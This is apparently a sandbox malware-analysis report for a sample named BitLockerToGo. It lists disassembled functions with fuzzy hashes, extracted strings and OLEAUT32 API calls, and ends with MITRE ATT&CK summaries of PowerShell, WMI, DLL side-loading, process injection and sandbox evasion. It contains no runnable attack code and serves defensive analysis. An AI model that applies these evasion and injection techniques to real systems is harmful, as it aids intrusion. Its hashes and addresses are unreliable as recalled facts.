Function 0043C9F0 Relevance: .7, Instructions: 673COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3965274b0536857c50447af1ae6594117020875228d2aa9cb03ef28dbcab804c
Instruction ID: 2f7020e157ed760e786d0d52bd835137ce291bf713f0b448248599f82df3eef5
Opcode Fuzzy Hash: 3965274b0536857c50447af1ae6594117020875228d2aa9cb03ef28dbcab804c
Instruction Fuzzy Hash: 3F22007AB14211CFCB08CF78D8916AAB7E2FF8A310F1A857DD94597391D7399902CB84

Function 00406770 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91a655f997009207fe9f5d596b84a614ebca634d55f189b5b5a5f702f5bbda6b
Instruction ID: 68deb51b96a68cf1c410fd32c8db55e596ea42aa58ab25683025db3c18027bb2
Opcode Fuzzy Hash: 91a655f997009207fe9f5d596b84a614ebca634d55f189b5b5a5f702f5bbda6b
Instruction Fuzzy Hash: F652E1B0908B849FE731CF24C4843A7BBE1AB51310F15893EC5E716BC2D27DB9958B1A

Function 00407550 Relevance: .6, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27a42a59939d58b0a73be27afc638faaf152d1ca92e020dc2fc49d1790f1e8db
Instruction ID: 8faa173e7650551b3a6104ad273a14f8098c02f5c1787825874974823077173b
Opcode Fuzzy Hash: 27a42a59939d58b0a73be27afc638faaf152d1ca92e020dc2fc49d1790f1e8db
Instruction Fuzzy Hash: 0322C231A0C7118BD725DF18D8806ABB3E1BFC4319F19893ED986A7385D738B8518B87

Function 00403990 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f61f9f2d54a6ed3acb6fa97e7f01098623e8104cb066d29cc7c4b0be03a1b55
Instruction ID: da5131da152b8db59e79d480049fb039ca813a02a3a4a197b2317776562ef35a
Opcode Fuzzy Hash: 5f61f9f2d54a6ed3acb6fa97e7f01098623e8104cb066d29cc7c4b0be03a1b55
Instruction Fuzzy Hash: 4D324570A14B118FC328CF29C680526BBF5BF85711B604A2ED697A7F90D73AF945CB18

Function 00411028 Relevance: .6, Instructions: 599COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4b70208a04350ddce129f97950b6d10854f71891d76079de1498284d638bb21
Instruction ID: 1e829380dcd519aeae6dae35f2ab19e3338b9bd820fe40d9c222203c922f7051
Opcode Fuzzy Hash: b4b70208a04350ddce129f97950b6d10854f71891d76079de1498284d638bb21
Instruction Fuzzy Hash: 88321675604B408FC714DF38C4853AABBE1AF95310F198A3ED5EB873D2E638A445CB06

Function 0043CB20 Relevance: .6, Instructions: 577COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e35b1fd7e58953bfb55bbdc77c725717805c892d83e3fee5e6781ba623c2df58
Instruction ID: 442d6a3c94c0d4c1ef6b0f395542744d197acc320fb0d8ad4dc286b928c59a6b
Opcode Fuzzy Hash: e35b1fd7e58953bfb55bbdc77c725717805c892d83e3fee5e6781ba623c2df58
Instruction Fuzzy Hash: 5002FF7AB14211CFCB08CF68D8916AAB7E2FB8E320F1A857DD955D7391D734D9028B84

Function 0043CBB0 Relevance: .5, Instructions: 543COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ae6c02fb8f6695c3802a28a1f9a136592e9bf508eaca461d7d515ae80723c72
Instruction ID: 24271e0be67d3490e517afe57e83b27d18a6fb5dd22eee77852757afd3417804
Opcode Fuzzy Hash: 0ae6c02fb8f6695c3802a28a1f9a136592e9bf508eaca461d7d515ae80723c72
Instruction Fuzzy Hash: 7EF1F17AB14210CFCB08CF78D8916AAB7E2FB8E324F1A857DD855D7391D73599028B84

Function 004059D0 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0b5b1b4a0beb7ebf6dfb77f3cabc98dd4db86f1918218b48f5c7098652c55da
Instruction ID: f92b5faa9d35bdea7f2291d8feb278b953cf00abd575da7c9a8ee3ebf1a23bbf
Opcode Fuzzy Hash: f0b5b1b4a0beb7ebf6dfb77f3cabc98dd4db86f1918218b48f5c7098652c55da
Instruction Fuzzy Hash: E2F1CD356087418FC724CF29C88062BFBE6EFD9300F08882EE5D597391E679E945CB96

Function 00437420 Relevance: .4, Instructions: 432COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3b6358e092ecac39d1c472929cdd3e628cfc42c93c10eb60bd09af837cce2e4
Instruction ID: b91f3b7690443c95d2fb76b5951ba5c87ac490bd86f439cacb063572b9ad44f0
Opcode Fuzzy Hash: c3b6358e092ecac39d1c472929cdd3e628cfc42c93c10eb60bd09af837cce2e4
Instruction Fuzzy Hash: 9EB17BB260C7145FD734DF24888162BB7A1DBCA724F24A92ED5C963341D738EC01CB99

Function 0041CD90 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f71cb1862573196f0c820b60cd84c966c5fe7d10818ae7014505e0021daf6c14
Instruction ID: d27b0351975e5b9a7d0699278968a495b048e52bbcedb0348993372f2f316ec4
Opcode Fuzzy Hash: f71cb1862573196f0c820b60cd84c966c5fe7d10818ae7014505e0021daf6c14
Instruction Fuzzy Hash: 1FB12675944300AFD7149F24CC81B5BBBE2BFD8314F148A2EF898A32A0DB769D55CB46

Function 004062E0 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fd56f46f9b34401e6af5e4cf16cdde13d6b2c11c969ca6269032b224b060b14
Instruction ID: 8427f143bb0e975c9e385fd09c55e83d08b5a86dab9d7a59e34952b768e08758
Opcode Fuzzy Hash: 9fd56f46f9b34401e6af5e4cf16cdde13d6b2c11c969ca6269032b224b060b14
Instruction Fuzzy Hash: 37C16CB29087418FC320CF28DC86BABB7E1BF85318F09492DD5DAD6342E778A155CB46

Function 0043DFA0 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 18b2739d7576cd14916e6d710f1d4aa08121483e70e5e5be14455d0545187d78
Instruction ID: bf4a5cc04141567fdf660c07882148a923b680a3f7beb0de497ab45fdd8adf0c
Opcode Fuzzy Hash: 18b2739d7576cd14916e6d710f1d4aa08121483e70e5e5be14455d0545187d78
Instruction Fuzzy Hash: DC8114316093119FDB258F19C481A6BB7E2FFC9310F18A92DE98547391C778AC41C786

Function 0043DD20 Relevance: .2, Instructions: 245COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 267949ea1b04aa2d1df92d12c471685b44d69eff419ef0852b5a0882aa92f2b6
Instruction ID: 3cbb95db175af8c2bbb324fe76004412ece8f8de19b64973d5b25b8f469430e1
Opcode Fuzzy Hash: 267949ea1b04aa2d1df92d12c471685b44d69eff419ef0852b5a0882aa92f2b6
Instruction Fuzzy Hash: 4271BE35A042019BD725DF18E881A6BB7F2FFD9314F14A62DE5858B360D734EC41CB85

Function 00437180 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b000631272a948ad1171053811913d6bc184f4891fec8b74ad4a693adabcf3d6
Instruction ID: 883520b37621a85b5029d408f0b877dd47d39d1854489c6cb5088d8a771cbe3e
Opcode Fuzzy Hash: b000631272a948ad1171053811913d6bc184f4891fec8b74ad4a693adabcf3d6
Instruction Fuzzy Hash: 015127B530C2009BEB25DF25EC92B3F3792EB8A314F10583DE9C546291D7799C06DB5A

Function 00439BF0 Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f2ccb2bea4bf6c19290799c298238d7b837800e04c28cdc1f7d3dc0702add3b
Instruction ID: 23394277ef8040c1e30f15f8cd2efc30ccd225322cc90d418196611391988ba8
Opcode Fuzzy Hash: 9f2ccb2bea4bf6c19290799c298238d7b837800e04c28cdc1f7d3dc0702add3b
Instruction Fuzzy Hash: 1051F732B047105BC728DE3DDC9226BB7D2EBD9324F18662EE8A5973D1D6789C01C789

Function 004233CA Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43c968c662aeb88300e76e6bcfd2c9a0bd4ae9a5b9f6feca94f25e161b3d2faa
Instruction ID: 0e6042dda9b301b8e35bab5457388ec383088d8307e52e10af8923dc5ed3557a
Opcode Fuzzy Hash: 43c968c662aeb88300e76e6bcfd2c9a0bd4ae9a5b9f6feca94f25e161b3d2faa
Instruction Fuzzy Hash: 2B5162B56043008FD725CF39C985A6A7F72FB85314F5682ACD851AF3AAD778C802CB85

Function 00430C20 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c511ef2b6809b4affa22ae0ae1d5dac433bd0b7d374820d9c4fa272b67febc25
Instruction ID: 461325d9be3771ea5bb132b1afdbe5f999f048cc131aa9051e163b55437d4e5c
Opcode Fuzzy Hash: c511ef2b6809b4affa22ae0ae1d5dac433bd0b7d374820d9c4fa272b67febc25
Instruction Fuzzy Hash: A9513827B499D04BD3288A7C5C223A66A930BDB330F3DD76AD5B18B3E5C57D8C024359

Function 00435ED0 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75fe9a7ff1e933d72a7d4168b964afefdca25735b7ba55603740c0c5842501f6
Instruction ID: e99d8b82f5b9a4e4bf1a869348d513371ff949b0095af31d44ed924102a251c0
Opcode Fuzzy Hash: 75fe9a7ff1e933d72a7d4168b964afefdca25735b7ba55603740c0c5842501f6
Instruction Fuzzy Hash: 86516BB16087548FE314DF69D49435BBBE1BB88318F054E2EE4E987350E379DA088F86

Function 0042AE96 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a488fa09b12548164b5b5062da13b33228014dffe047b82726be4e151ec9271
Instruction ID: 3897899c21c746827965dba1279c439651406a8e9d8f90fb356093dcecd7920b
Opcode Fuzzy Hash: 5a488fa09b12548164b5b5062da13b33228014dffe047b82726be4e151ec9271
Instruction Fuzzy Hash: F65169207493618FD715CB28D4C0277B792DF92354F9E866BC8914B3DAD33D881AD39A

Function 0040DDFA Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cafc9f8797b9e3e12007b6d2e2947618089e407aea4270bb9443aa5da376b6ab
Instruction ID: 9c7bb751a5460e5448bafc5a0c951509cef51987ee113d2cab9384d166c6b09f
Opcode Fuzzy Hash: cafc9f8797b9e3e12007b6d2e2947618089e407aea4270bb9443aa5da376b6ab
Instruction Fuzzy Hash: 8B5144B16117029BE3288F25C892716BBB2FF65308F24919CD1451FB96DBBB9417CF84

Function 0043C2EE Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d43e13a5539f33f704f62bd30e0be2a5e9f99412b61026709753b2c5eb50e438
Instruction ID: 9dcd6aa5102db1afdbfa91f0de00c48066483fc8e768c13c23b2474ef312a5b2
Opcode Fuzzy Hash: d43e13a5539f33f704f62bd30e0be2a5e9f99412b61026709753b2c5eb50e438
Instruction Fuzzy Hash: EC213225B985914BC708CF3888A10BBFBD69BCF214F18E63E9452D7291CA28DD068788

Function 00402BB0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 303a53f8f6f0c13bc9f298785c5808cb8a276daa0cafb7ca22b80b88847c91e1
Instruction ID: 953e48cafc7d386bd6fe2fc87ead75cd4de4f62e5a098d70ce4eb15270d3d039
Opcode Fuzzy Hash: 303a53f8f6f0c13bc9f298785c5808cb8a276daa0cafb7ca22b80b88847c91e1
Instruction Fuzzy Hash: F7110437B2822207F754DE26DDD861B6352EBCA31074A0136EE41E7382CAB5F805D1A4

Function 00408810 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0456f69780e112473bc9f9c2010f7405742c94c48a2e701fdc02f08006fae4ff
Instruction ID: af04ffe1cd29dee56f132f4f754c5d313c06814b24a4d70335b53af1f56d60f1
Opcode Fuzzy Hash: 0456f69780e112473bc9f9c2010f7405742c94c48a2e701fdc02f08006fae4ff
Instruction Fuzzy Hash: AD21A233E1292047D310CA55C9007563296ABC5369F7EC6B9C968AF7D2CA3BAC1386C4

Function 0041AB1A Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 572ceb69780f3392d41ca6c9e0603aef9c8fe904a06e13014da24633e2e49a2c
Instruction ID: 6a3541d2acb157ad4db1e9287bc40791a76c7a8463dbebd15c4b31474a67dff4
Opcode Fuzzy Hash: 572ceb69780f3392d41ca6c9e0603aef9c8fe904a06e13014da24633e2e49a2c
Instruction Fuzzy Hash: 7F11253050C3D08BDB228B2498603F7BFF0EF63324F14099EE2D19B282C3299552872B

Function 004277A1 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b4378fe9218695e9efab3cd03d4f9a3a61e28202572d20128c641435f14578e1
Instruction ID: 3786650eb146f7874297543a17454be3989082a0a873671d11c82bb5fd205540
Opcode Fuzzy Hash: b4378fe9218695e9efab3cd03d4f9a3a61e28202572d20128c641435f14578e1
Instruction Fuzzy Hash: 6811067970C520EBDB2A5B24E855A3F73A2FB95315FB0582ED54212211D335AC02CB9D

Function 00429CD0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3f69d2cddd8d1d41eb811920ce7bb414a30f77a1915c573363424695d72b567
Instruction ID: 2b7a75b310cf6e7c27b2cdf23322de32184d6ddae8fecbe38c3d0d7a708c7bc0
Opcode Fuzzy Hash: e3f69d2cddd8d1d41eb811920ce7bb414a30f77a1915c573363424695d72b567
Instruction Fuzzy Hash: 3401B1F270071157D720AE16F5C0B27B2A86F80708F58443EE84857342DBBDEC09E6A9

Function 0042C199 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08d5f25956ec8e40c121eba7491b1c8ecd5884205fc160bc28c8dc4df6ad3e7b
Instruction ID: b072f2133b5b56dbc7795633f907e47fd0f6eaee5254b13e76233338d31dc155
Opcode Fuzzy Hash: 08d5f25956ec8e40c121eba7491b1c8ecd5884205fc160bc28c8dc4df6ad3e7b
Instruction Fuzzy Hash: 1FF0E51810C6E18EDB458F3894E13327FA19B03308F6CA49EC4C28B343C5268408CF68

Function 00425E20 Relevance: 31.7, APIs: 1, Strings: 17, Instructions: 244COMMON

Download Yara Rule

Strings

2@, xrefs: 0042663C
S1]3, xrefs: 004267A0
^G, xrefs: 0042688F
IF, xrefs: 00426897
N)C+, xrefs: 0042678A
DE, xrefs: 004267D7
$A$C, xrefs: 004267CC
Q9];, xrefs: 004267B6
n+), xrefs: 00426718
K-r/, xrefs: 00426795
7\/^, xrefs: 004266E0
K%H', xrefs: 00426782
Z5P7, xrefs: 004267AB
|!A#, xrefs: 00426826
"L!N, xrefs: 00426631
KLM, xrefs: 004265C2
LE, xrefs: 004268A2

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "L!N$$A$C$2@$7\/^$DE$IF$K%H'$K-r/$LE$N)C+$Q9];$S1]3$Z5P7$^G$n+)$|!A#$KLM
API String ID: 0-1086502116
Opcode ID: 41c6464524ea21cedc8cdaad1baebf8af02fdaf39373aa5bb2e0ae742d3a71b2
Instruction ID: b5e3e3002248b422e105bd253f303610e53f33e8b3b095550b94881be720018d
Opcode Fuzzy Hash: 41c6464524ea21cedc8cdaad1baebf8af02fdaf39373aa5bb2e0ae742d3a71b2
Instruction Fuzzy Hash: 2181CCB86083908BD3309F25E85279BBBF0FF92704F15492DE5C99B352D7798941CB8A

Function 00430528 Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 161memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 004305A6

Strings

w, xrefs: 004306CF
, xrefs: 0043062F
6, xrefs: 0043068F
z, xrefs: 0043072F
_, xrefs: 00430536
,, xrefs: 0043063F
h, xrefs: 004306BF
v, xrefs: 004306DF
0, xrefs: 0043084C
@, xrefs: 0043054A
t, xrefs: 004306AF
(, xrefs: 0043061F
;, xrefs: 004305CF
[, xrefs: 00430540
/, xrefs: 004305BF

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: AllocString
String ID: $($,$/$0$6$;$@$[$_$h$t$v$w$z
API String ID: 2525500382-1320459350
Opcode ID: 74759230622c1fafdad58b18693dc4f0910fa6fc7d58cf1eee3d6dee53592b83
Instruction ID: e1250cad9f459cde51c8b94f344e925a183d72e4e1eb9be8baf593ca54fff1fc
Opcode Fuzzy Hash: 74759230622c1fafdad58b18693dc4f0910fa6fc7d58cf1eee3d6dee53592b83
Instruction Fuzzy Hash: 4191052150C7D18EE332C73C884879BBED15BA7228F084B9EE4ED5B2D2D7B945058767

Function 004300B9 Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 95COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 0043010D

Strings

}, xrefs: 00430187
a, xrefs: 0043019B
w, xrefs: 00430169
s, xrefs: 00430155
c, xrefs: 004301A5
u, xrefs: 0043015F
{, xrefs: 0043017D
b, xrefs: 004301A0
O, xrefs: 00430141
M, xrefs: 00430137
q, xrefs: 0043014B
K, xrefs: 0043012D
y, xrefs: 00430173

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitVariant
String ID: K$M$O$a$b$c$q$s$u$w$y${$}
API String ID: 1927566239-3974332
Opcode ID: 62173869f4b5f8ae6c41ea67a547a3728c53432e46bd58f5cc30ebd635a810a2
Instruction ID: 0880ca406e64cd27820feb041266c4c3ad1d07fce193fd926a63749628f74132
Opcode Fuzzy Hash: 62173869f4b5f8ae6c41ea67a547a3728c53432e46bd58f5cc30ebd635a810a2
Instruction Fuzzy Hash: 3F41377050C7C18ED325CB78845879FBFE1ABA6314F084A9DE4D94B3D2D6B98509C763

Function 004303DF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 74COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 004303E9
VariantInit.OLEAUT32 ref: 004303FC

Strings

m, xrefs: 0043042B
&, xrefs: 0043045D
p, xrefs: 00430435

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: Variant$ClearInit
String ID: &$m$p
API String ID: 2610073882-1175575865
Opcode ID: fbbccc6316c81d781c046fa5f464a6966e20e8c2c4e7df863260449e87ccbe5d
Instruction ID: 0d9e2f7827293927a5cfb8656bdc0ef3d7868a73e2fca87288ca134e2872853a
Opcode Fuzzy Hash: fbbccc6316c81d781c046fa5f464a6966e20e8c2c4e7df863260449e87ccbe5d
Instruction Fuzzy Hash: 5A31D53050C7C18EC3619B38888869FBFE16BD7324F484A5DE5E64B2E2D7769049CB57

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

